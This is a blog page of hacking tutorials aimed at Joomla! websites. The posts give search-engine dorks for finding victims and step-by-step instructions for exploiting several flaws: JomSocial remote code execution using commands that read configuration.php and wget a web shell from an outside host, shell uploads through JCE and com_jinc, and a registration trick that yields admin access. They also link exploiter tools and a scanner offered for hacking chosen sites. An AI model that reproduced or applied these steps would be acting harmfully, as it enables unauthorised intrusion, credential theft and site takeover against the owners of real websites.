Affichage des articles dont le libellé est Joomla!. Afficher tous les articles
Affichage des articles dont le libellé est Joomla!. Afficher tous les articles

[JOOMLA] JomSocial 2.6 Remote Code Execution



Dork:
inurl:/index.php?option=com_community
Procedure
   1- Copy the dork and paste it on Google or any other search engine
   2- Chose any site
   3- Run the JomSocial Exploiter by Gothie
   4- Paste the site URL in the given textbox and click Connect
   5-If site is vulnerable, you will get the message as below

   6- Now, you can execute any command remotely. The commands are as below:
system('id & uname -a');
 system('ls');
system('cat configuration.php');
    7- To upload shell, you need to have raw shell (shell.txt) uploaded anywhere and can be access directly without executing it. Type in the command below to import your shell and save it as .php
system('wget http://socialmediasuccesstools.com/shell.txt -O shell.php');
   8- Your shell can be found at http://victim.com/shell.php


Downloads
JomSocial Exploiter by Gothie (2.7MB) 

~ mercredi 29 octobre 2014 0 commentaires

Exploit Joomla!: JCE


It has been a very long time that i haven't post here, so as for today i'm going to post a new tutorial on how to upload shell with method JCE.

Thing Required:
JCE Exploiter : DOWNLOAD 

DORKS:
 inurl:"images/stories" php
"index of /images/stories/powered_by.png"
"index of /images/stories/joomla-dev_cycle.png"
"index of /images/stories/food"
"index of /images/stories/fruit"
inurl:"/images/stories/food"
inurl:"/images/stories/fruit"
inurl:index.php?option=com_jce
inurl:index.php?option=com_virtuemart
inurl:joomla/index.php?option=com_virtuemart

Steps:
1- Copy any of the dorks, and paste on google





- Choose any site
  

3 - Open up JCE.exe




 4 - Paste the site that you chose in the textbox

 5 - Click on START

6 - If the shell successfully upload, you will get the link to the shell





7 - Go to the given url, and upload your shell

 
 Video



Video by Tentera Siber Legion


~ jeudi 19 juin 2014 0 commentaires

Exploit Joomla! : com_jinc






POC:

Dork: inurl:option=com_jinc

Exploit: 

/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=shell.php 

Shell Uploaded to:

 /administrator/components/com_jinc/classes/graphics/tmp-upload-images/shell.php


This exploit is exactly the same as the previous post: Exploit Joomla :com_maian15

~ vendredi 7 mars 2014 0 commentaires

How to Upload Shell in Joomla! Site [Video]







~ 0 commentaires

Exploit Joomla! : Com_user [Manual]



  Hello everyone! It has been a while that i haven't update this blog post since i was very busy. So, as for today i wanna post about exploit in CMS Joomla! which the vulnerability is we can register new user on the site.

Finding Vulnerable target:

Dorks:

inurl:index.php/using/joomla site:com
   
intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com

MORE DORKS

Exploit:

index.php?option=com_users&view=registration


1- Copy any of the dorks and paste it on Google
2- Choose any site and check administrator page by adding /administrator/ at the end of the site URL.

Example:

 www.site.com/index.php/using-joomla/extensions/components/content-component/article-category-list/50-terapia

to

www.site.com/administrator/

So you will see the admin login area. If the admin login area is like the picture below, it might be vulnerable,

  
Vulnerable

 Not Vulnerable

*Note: Ignore the language of the admin login panel.
Exploiting Target

1- Paste the exploit behind the site URL, so you will get the registration form.

2- Fill in the form, at the password column, put different password.For Example,

Password: abcdefg
Confirm Password: abcxyz123

3- In the Confirm Email Column, click inspect element and paste this code below it,


4- Click register, and it will says "Password not match.." or something similar, simply fill the form correctly and click register.

5- The confirmation email will be send to your email address, check your inbox and click on the link given to activate your account

6- Go to administrator login area, and login with your username and password.


Can't understand? Watch this video, and leave a comment :D



Also see: How to Upload Shell In Joomla! Site [Video]

~ 0 commentaires

Joomla! Exploit Scanner V1 [Released!]


Hello everyone, this is the Joomla! Exploit Scanner that i made, hope this scanner could help you to find bug in the site that you want to hack :)




Demostration Video :

 


~ jeudi 27 février 2014 0 commentaires